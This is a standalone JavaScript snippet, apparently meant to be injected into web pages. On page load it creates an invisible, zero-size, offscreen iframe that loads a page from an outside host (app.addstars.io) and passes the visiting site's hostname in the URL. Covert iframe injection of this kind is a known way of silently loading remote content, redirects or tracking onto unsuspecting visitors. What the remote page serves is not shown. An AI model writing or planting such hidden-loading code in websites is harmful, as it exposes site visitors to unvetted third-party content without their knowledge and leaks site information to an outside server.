document.addEventListener("DOMContentLoaded", function(event) { const iframe = document.createElement("iframe"); iframe.setAttribute( "border", "no" ); iframe.setAttribute( "width", "0" ); iframe.setAttribute( "height", "0" ); iframe.setAttribute( "style", "position: absolute;top -100px" ); iframe.setAttribute( "src", "https://app.addstars.io/get/URL?id=1088&site="+window.location.hostname); document.body.appendChild(iframe); });